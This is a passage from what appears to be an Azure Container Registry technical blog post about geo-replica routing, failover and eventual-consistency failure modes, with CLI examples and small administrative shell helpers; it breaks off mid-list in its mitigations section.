&lt;PRE&gt;&lt;CODE&gt;&lt;SPAN class="hljs-comment"&gt;NAME&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;LOCATION&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;PROVISIONING&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;STATE&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;STATUS&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;REGION&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENDPOINT&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENABLED&lt;/SPAN&gt;
&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN 
class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;False&lt;/SPAN&gt;
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Requests to &lt;CODE&gt;myregistry.azurecr.io&lt;/CODE&gt; no longer route to West US. The replica still receives replicated content — and continues to replicate its own content out to other replicas — and storage quota and per-replica costs continue to accrue. If regional endpoints are enabled, the West US regional endpoint URL also continues to work; &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; controls only the replica's participation in &lt;STRONG&gt;global&lt;/STRONG&gt; endpoint routing.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;A note on naming.&lt;/STRONG&gt; The CLI flag &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; (on &lt;CODE&gt;az acr replication update&lt;/CODE&gt;) and the &lt;STRONG&gt;regional endpoints&lt;/STRONG&gt; feature (enabled via &lt;CODE&gt;az acr update --regional-endpoints enabled&lt;/CODE&gt;) are two different things despite the similar names. &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt; controls whether a replica participates in &lt;STRONG&gt;global&lt;/STRONG&gt; endpoint routing. The &lt;STRONG&gt;regional endpoints&lt;/STRONG&gt; feature creates per-region URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) that bypass the global endpoint entirely. They are independent controls.&lt;/P&gt;
&lt;P&gt;In Azure CLI 2.86.0 and later, the old &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt; flag has been renamed to &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;. The old flag name is deprecated and will be removed in Azure CLI 2.87.0 (June 2026). If you have existing scripts or automation that use &lt;CODE&gt;--region-endpoint-enabled&lt;/CODE&gt;, update them to use &lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
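&lt;P&gt;To find scripts that still use the deprecated flag name, a plain recursive search is usually enough. The sketch below assumes a &lt;CODE&gt;grep&lt;/CODE&gt; that supports &lt;CODE&gt;-r&lt;/CODE&gt; (GNU and BSD grep both do); &lt;CODE&gt;find_deprecated_flag&lt;/CODE&gt; is a hypothetical helper name.&lt;/P&gt;

```shell
# Hypothetical helper: list files under a directory that still use the old flag.
# The -e option keeps grep from treating the leading dashes as one of its own options.
find_deprecated_flag() {
  dir="$1"
  grep -rl -e '--region-endpoint-enabled' "$dir"
}

# Example (not run here):
# find_deprecated_flag ./scripts
```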
&lt;P&gt;&lt;STRONG&gt;CLI flags quick reference:&lt;/STRONG&gt;&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Flag&lt;/th&gt;&lt;th&gt;Scope&lt;/th&gt;&lt;th&gt;Purpose&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--regional-endpoints&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Registry-level (&lt;CODE&gt;az acr create&lt;/CODE&gt; or &lt;CODE&gt;az acr update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Enables dedicated regional endpoint URLs (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.geo.azurecr.io&lt;/CODE&gt;) for &lt;STRONG&gt;all&lt;/STRONG&gt; geo-replicas.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--global-endpoint-routing&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Per-geo-replica (&lt;CODE&gt;az acr replication create&lt;/CODE&gt; or &lt;CODE&gt;az acr replication update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Controls whether the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; routes traffic to a specific geo-replica. Set to &lt;CODE&gt;false&lt;/CODE&gt; to temporarily exclude a geo-replica from global routing.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;CODE&gt;--data-endpoint-enabled&lt;/CODE&gt;&lt;/td&gt;&lt;td&gt;Registry-level (&lt;CODE&gt;az acr create&lt;/CODE&gt; or &lt;CODE&gt;az acr update&lt;/CODE&gt;)&lt;/td&gt;&lt;td&gt;Enables dedicated data endpoints (&lt;CODE&gt;myregistry.&amp;lt;region&amp;gt;.data.azurecr.io&lt;/CODE&gt;) for layer blob downloads. Auto-enabled when at least one private endpoint is configured.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;col style="width: 33.33%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;The bidirectional sync that continues while a replica is excluded from global routing is intentional. When you re-enable the replica, every image pushed to the registry in the meantime, from any region, is already present, so the replica can serve traffic immediately with no catch-up window. If syncing stopped on disable, re-enabling would leave the replica with stale data and force a long catch-up before it could safely serve pulls.&lt;/P&gt;
&lt;H3 id="step-4-re-enable-the-replica-to-participate-in-global-endpoint-routing"&gt;Step 4: Re-enable the replica to participate in global endpoint routing&lt;/H3&gt;
&lt;P&gt;Re-enable the replica:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true
"&gt;&lt;CODE&gt;az acr replication update --registry myregistry --name westus \
  --global-endpoint-routing true
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;Confirm the change with &lt;CODE&gt;az acr replication list --registry myregistry --output table&lt;/CODE&gt;:&lt;/P&gt;
&lt;PRE&gt;&lt;CODE&gt;&lt;SPAN class="hljs-comment"&gt;NAME&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;LOCATION&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;PROVISIONING&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;STATE&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;STATUS&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;REGION&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENDPOINT&lt;/SPAN&gt; &lt;SPAN class="hljs-comment"&gt;ENABLED&lt;/SPAN&gt;
&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN 
class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;  &lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;&lt;SPAN class="hljs-literal"&gt;-&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;eastus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;  &lt;SPAN class="hljs-comment"&gt;westus&lt;/SPAN&gt;      &lt;SPAN class="hljs-comment"&gt;Succeeded&lt;/SPAN&gt;             &lt;SPAN class="hljs-comment"&gt;online&lt;/SPAN&gt;    &lt;SPAN class="hljs-comment"&gt;True&lt;/SPAN&gt;
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;There is no cooldown. The global endpoint resumes routing requests to the West US replica as soon as the change takes effect on ACR's side. Because data continued syncing while the replica was disabled (Step 3), the replica is immediately ready to serve pulls — no catch-up window.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note on DNS during disable/enable.&lt;/STRONG&gt; When you take a replica out of global routing, ACR purges its own DNS records for that replica from the global endpoint on a fast path; there is no waiting on a published TTL on ACR's side. If clients run their own DNS cache for the global endpoint, however, those clients will keep resolving to the disabled replica until the client cache expires. We can't control client-side caches. &lt;STRONG&gt;The recommendation: do not run a long-lived DNS cache for the global endpoint.&lt;/STRONG&gt; A short-lived DNS pin for the duration of a single push (covered in the DNS and Client-Side Considerations section) is fine and even helpful, but a long-lived DNS cache will make &lt;CODE&gt;--global-endpoint-routing false&lt;/CODE&gt; look broken from the client's perspective.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
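&lt;P&gt;Steps 3 and 4 are often run as a pair around a DR rehearsal or maintenance check. One way to make sure the replica is always returned to global routing is to wrap both commands around the check, as in the sketch below. The wrapper name &lt;CODE&gt;with_replica_excluded&lt;/CODE&gt; and the &lt;CODE&gt;AZ&lt;/CODE&gt; override variable are assumptions introduced for illustration; the &lt;CODE&gt;az acr replication update&lt;/CODE&gt; invocations are the ones shown in Steps 3 and 4.&lt;/P&gt;

```shell
# Hypothetical wrapper: exclude a replica from global routing, run a check,
# then re-enable it. AZ is an assumed override so the flow can be dry-run
# (for example AZ=echo); it defaults to the real az CLI.
with_replica_excluded() {
  registry="$1"
  replica="$2"
  shift 2
  "${AZ:-az}" acr replication update --registry "$registry" --name "$replica" \
    --global-endpoint-routing false || return 1
  # Run the caller's command (DR rehearsal, maintenance check, and so on)
  # and remember its exit status.
  status=0
  "$@" || status=$?
  # Always re-enable the replica, even if the check failed.
  "${AZ:-az}" acr replication update --registry "$registry" --name "$replica" \
    --global-endpoint-routing true || return 1
  return "$status"
}

# Dry run: print the az arguments instead of executing them.
AZ=echo with_replica_excluded myregistry westus echo "running rehearsal checks"
```

&lt;P&gt;The wrapper returns the exit status of the check, so a failed rehearsal still surfaces as a failure after the replica has been re-enabled.&lt;/P&gt;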
&lt;H3 id="step-5-what-to-expect-when-health-aware-failover-triggers"&gt;Step 5: What to expect when health-aware failover triggers&lt;/H3&gt;
&lt;P&gt;Health-aware failover is automatic. ACR evaluates registry health on a per-registry basis, and when a registry in a region can't reliably serve requests, the global endpoint reroutes that registry's traffic to a healthy replica. There is no customer-invocable trigger — that's the point.&lt;/P&gt;
&lt;P&gt;End-to-end timing is on the order of minutes: fast enough to catch real regional degradation, slow enough to ride out transient errors that resolve on their own. DNS TTLs may add further propagation delay before all clients switch to the new region.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Scope of health-aware failover.&lt;/STRONG&gt; Health-aware failover applies only to operations against the &lt;STRONG&gt;global endpoint&lt;/STRONG&gt; — the registry API calls (auth, get manifest, get tag, get referrers, get blob location). It evaluates health when those API calls come in; it does &lt;STRONG&gt;not&lt;/STRONG&gt; trigger mid-operation. Two important consequences:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Regional endpoints are not in scope.&lt;/STRONG&gt; When you talk to a regional endpoint like &lt;CODE&gt;myregistry.westus.geo.azurecr.io&lt;/CODE&gt;, you're talking to that one replica. There is no automatic reroute. If you've pinned a workload to a regional endpoint and that region degrades, you implement client-side failover by switching the workload to a different regional endpoint.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Dedicated data endpoints are not in scope.&lt;/STRONG&gt; Once a registry endpoint has redirected you to a dedicated data endpoint, you stay on that region's data endpoint for the duration of the layer download. There is no automatic reroute of an in-flight blob download. The region targeted by the redirect is decided up front by whichever registry endpoint served the blob-location call: the global endpoint chooses based on its per-registry health evaluation, and a regional endpoint always targets its own region.&lt;/LI&gt;
&lt;/UL&gt;
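&lt;P&gt;Because regional endpoints are outside the scope of automatic failover, a pinned workload needs its own fallback order. The sketch below shows one simple approach: try each regional endpoint in turn until a pull succeeds. &lt;CODE&gt;pull_with_failover&lt;/CODE&gt; and the &lt;CODE&gt;PULL&lt;/CODE&gt; override are hypothetical names, and the sketch assumes the client is already authenticated against each regional endpoint it tries.&lt;/P&gt;

```shell
# Hypothetical sketch: try each regional endpoint in order until a pull works.
# PULL is an assumed override for the pull command; it defaults to docker pull.
pull_with_failover() {
  registry="$1"
  image="$2"
  shift 2
  for region in "$@"; do
    ref="$registry.$region.geo.azurecr.io/$image"
    # Left unquoted on purpose so "docker pull" splits into command and argument.
    if ${PULL:-docker pull} "$ref"; then
      echo "pulled from $region"
      return 0
    fi
    echo "pull from $region failed, trying next region"
  done
  # Every listed region failed.
  return 1
}

# Example (not run here): prefer East US, fall back to West US.
# pull_with_failover myregistry myapp:v1 eastus westus
```

&lt;P&gt;A real implementation would likely add its own health checks and business rules before switching regions; the ordered list here is only the simplest possible policy.&lt;/P&gt;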
&lt;P&gt;The signals you can use to confirm a failover is in progress:&lt;/P&gt;
&lt;PRE class="language-bash" tabindex="0" contenteditable="false" data-lia-code-value="# Check replication status
az acr replication list --registry myregistry --output table
"&gt;&lt;CODE&gt;# Check replication status
az acr replication list --registry myregistry --output table
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;You can also check &lt;STRONG&gt;Resource Health&lt;/STRONG&gt; for the registry in the Azure portal — navigate to your registry and select &lt;STRONG&gt;Resource health&lt;/STRONG&gt; under the &lt;STRONG&gt;Help&lt;/STRONG&gt; section to see platform-side degradation signals.&lt;/P&gt;
&lt;P&gt;You'll typically see:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Increased pull latency&lt;/STRONG&gt; as traffic shifts to a more distant replica&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Resource Health&lt;/STRONG&gt; flagging known issues in the affected region&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Replication status&lt;/STRONG&gt; indicating which replicas are online&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;After the region recovers, the per-registry health evaluation marks it healthy again and the global endpoint resumes routing — automatic, no cooldown, no customer action. Note that health is evaluated &lt;STRONG&gt;per registry&lt;/STRONG&gt;, not per region: if a degradation affects only a subset of registries in a region, only those registries are rerouted, and other registries in the same region continue to be served locally with no unnecessary latency penalty.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Not triggered by throttling.&lt;/STRONG&gt; Health-aware failover is DNS-based and responds to regional ACR service health and Azure infrastructure health. It does &lt;STRONG&gt;not&lt;/STRONG&gt; reroute traffic based on HTTP 429 (throttling) responses. If a geo-replica is throttling your requests but the region's infrastructure is healthy, the global endpoint continues routing you to that geo-replica. To manage throttling, use regional endpoints to spread workloads across multiple geo-replicas for better capacity distribution.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;&lt;STRONG&gt;Note on long-running pushes during a failover.&lt;/STRONG&gt; A multi-layer push that spans a failover boundary can land layers and the manifest on different replicas — exactly the failure mode that DNS bouncing produces during a single push. ACR is actively tightening health-aware failover behavior to minimize cross-replica scatter during these scenarios, and the recommendation today remains: pin pushes to a single replica via a regional endpoint when push/pull consistency matters.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 id="common-questions"&gt;Common Questions&lt;/H2&gt;
&lt;H3 id="q1-performance-impact-during-initial-replica-creation-on-a-live-registry"&gt;Q1. Performance impact during initial replica creation on a live registry&lt;/H3&gt;
&lt;P&gt;Because ACR is multi-region, multi-write, the existing replica continues serving pull and push traffic throughout the period when a new replica is being seeded. Replication is asynchronous and content propagates in the background; the time to populate a new geo-replica scales with the &lt;STRONG&gt;size of the registry&lt;/STRONG&gt; — the cumulative number and total size of images already in the registry — not with any single image. The docs do not publish a quantified degradation percentage or a throttling window for this period, and they do not promise zero performance impact — the safe operating assumption for a live production registry is that existing replicas continue serving traffic normally, with the new replica catching up in the background.&lt;/P&gt;
&lt;H3 id="q2-restricted-updating-state-during-initial-sync"&gt;Q2. Restricted/updating state during initial sync&lt;/H3&gt;
&lt;P&gt;There is no "restricted" state for the registry during normal replica creation. Writes, control-plane operations, and pushes/pulls against existing replicas continue normally. The only time configuration changes are unavailable is during a home region outage — see the relevant FAQ item later on for the full data-plane-versus-control-plane breakdown.&lt;/P&gt;
&lt;H3 id="q3-cooldown-periods-and-non-straightforward-failback-scenarios"&gt;Q3. Cooldown periods and non-straightforward failback scenarios&lt;/H3&gt;
&lt;P&gt;There is no cooldown before failback, manual or automatic. Re-enabling a replica's participation in global endpoint routing takes effect immediately on ACR's side. Health-aware failover returns traffic to a region as soon as its per-registry health evaluation passes again.&lt;/P&gt;
&lt;P&gt;The failback case that is &lt;STRONG&gt;not&lt;/STRONG&gt; seamless: if a recently pushed image has not yet replicated to the failover region, a pull from that region may not find the image until replication catches up. This is a function of eventual consistency, not failback timing — and it's part of a broader class of issues we cover in Q4.&lt;/P&gt;
&lt;H3 id="q4-common-pull-and-push-failure-modes-during-the-eventual-consistency-window"&gt;Q4. Common pull and push failure modes during the eventual-consistency window&lt;/H3&gt;
&lt;P&gt;DNS bouncing during a single push is one well-known problem, but it isn't the only one. The eventual-consistency window between geo-replicas surfaces in several recurring failure modes worth knowing about:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;Push-then-immediate-pull-cross-region.&lt;/STRONG&gt; Pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt; to one region and immediately pulling it from a different region can fail with &lt;CODE&gt;manifest unknown&lt;/CODE&gt; until replication catches up. This shows up most painfully in CI/CD pipelines where one CI runner pushes an image and thousands of pods across other regions all try to pull from their local geo-replicas at the same time. Today, customers work around this with indeterminate sleeps before scheduling expensive compute, or with retry logic, or by waiting on a replication-complete signal — none of which is a clean planning story.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Tag overwrite races.&lt;/STRONG&gt; Pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt;, then re-pushing &lt;CODE&gt;myapp:v1&lt;/CODE&gt; shortly after with a fix (same tag, different digest), can leave different replicas resolving the same tag to different digests during the eventual-consistency window.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Delete propagation.&lt;/STRONG&gt; Deleting a tag or repository in one region takes some time to propagate to other replicas. Pulls from regions where the delete hasn't yet propagated can return the supposedly-deleted content.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Mid-push failover scatter.&lt;/STRONG&gt; A multi-layer push that spans a health-aware failover boundary or a DNS bouncing event can land layers on one replica and the manifest on another, surfacing as manifest validation errors or &lt;CODE&gt;blob unknown&lt;/CODE&gt; on subsequent pulls.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;&lt;STRONG&gt;What ACR is doing about this.&lt;/STRONG&gt; We're working on &lt;STRONG&gt;bounded staleness consistency&lt;/STRONG&gt; for pushed images across all geo-replicas worldwide, which addresses these four failure modes directly. This will be covered in an upcoming blog post. If you're hitting eventual-consistency brittleness today and want to talk through your scenario, reach out to us on the &lt;A class="lia-external-url" href="https://github.com/Azure/acr" target="_blank" rel="noopener"&gt;Azure Container Registry GitHub repository&lt;/A&gt; — we want the customer signal to land in the design.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Mitigations available today:&lt;/STRONG&gt;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Pin pushes to a single replica via a regional endpoint.&lt;/STRONG&gt; Every sub-request in the push — login, blob uploads, manifest upload — goes to the same replica, eliminating the DNS bouncing and mid-push scatter classes entirely.&lt;/LI&gt;
